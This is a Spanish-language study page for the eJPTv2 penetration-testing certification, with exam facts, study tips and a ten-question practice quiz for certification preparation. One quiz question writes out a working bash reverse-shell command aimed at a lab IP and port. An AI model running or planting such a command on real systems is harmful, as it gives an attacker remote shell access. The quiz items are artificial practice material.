Saltar al contenido
Open Security
eJPTv2Fundamental· INE

eLearnSecurity Junior Penetration Tester (eJPT)

Una certificación de seguridad ofensiva 100% práctica. Te evalúa hackeando una red real para responder preguntas de auditoría técnica.

Datos del examen

Valores aproximados. Confirmá siempre en la guía oficial vigente.

Preguntas

35

Duración

240 min

Aprobás con

70%

Costo aprox.

USD 250

Validez

3 años

Formato

Examen práctico en laboratorio interactivo real (35 preguntas basadas en hallazgos)

Recursos recomendados

Materiales seleccionados de alta calidad para dominar la teoría. La mayoría son gratuitos.

Consejos estratégicos para el examen

  • Aprendé a usar Nmap de manera eficiente (velocidades, tipos de escaneo) para descubrir servicios y puertos.
  • Dominá el uso básico de Metasploit, pero entendé la explotación manual de fallos web como SQLi e IDOR.
  • Familiarizate con el enrutamiento de red (pivoting) en entornos multi-red durante la fase de post-explotación.

Qué vas a poder hacer

Lo que valida la certificación una vez que la tenés.

  • Realizar escaneos de red activos y pasivos de manera segura.
  • Identificar y explotar vulnerabilidades web clásicas (OWASP Top 10).
  • Ejecutar exploits públicos y comprender su funcionamiento interno.
  • Realizar ataques de red básicos (ARP spoofing, cracking de contraseñas).

Dominios del examen

Cada área ponderada. Completá los labs sugeridos para dominar cada dominio práctico.

Rutas de estudio sugeridas

Caminos guiados para organizar tu preparación global.

Examen de práctica

Respondé las preguntas simuladas y evaluá tu nivel. Cada respuesta tiene feedback inmediato.

Práctica · eJPTv2

10 preguntas · aprobás con 70%

Preguntas propias de práctica, no del examen real.

  1. 1. ¿Qué parámetro de Nmap realiza un escaneo de tipo TCP SYN (half-open) rápido y sigiloso?

  2. 2. Encontrás un campo de entrada web vulnerable a XSS que ejecuta código JavaScript en el navegador de cualquier usuario que visite la página. ¿Qué tipo de XSS es?

  3. 3. ¿Qué protocolo de red traduce direcciones MAC a direcciones IP locales?

  4. 4. ¿Cuál es el propósito principal de la fase de 'Reconocimiento' en un test de penetración?

  5. 5. Si lográs explotar un comando de consola vulnerable e inyectás '/bin/bash -i >& /dev/tcp/10.10.10.5/4444 0>&1' para que el servidor se conecte a tu oyente local. ¿Qué creaste?

  6. 6. ¿Qué herramienta es el framework estándar de explotación ofensiva utilizado para buscar exploits, payloads y módulos de escaneo?

  7. 7. Al escanear un puerto web, encontrás que el servidor devuelve el header: 'Server: Apache/2.4.41'. ¿Cómo se llama esta fase?

  8. 8. ¿Qué técnica de inyección permite ejecutar consultas SQL no autorizadas en la base de datos a través de campos de entrada mal saneados?

  9. 9. Si querés descifrar hashes de contraseñas guardados en un archivo de texto de manera local y rápida usando un diccionario de palabras. ¿Qué herramienta usás?

  10. 10. ¿Qué puerto expone por defecto el protocolo SMB (Server Message Block) utilizado para compartir archivos en entornos Windows?

Open Security Labs no está afiliado a INE. eLearnSecurity Junior Penetration Tester (eJPT) y su código son marcas de su dueño. Verificá siempre los dominios vigentes en la guía oficial del examen antes de rendir.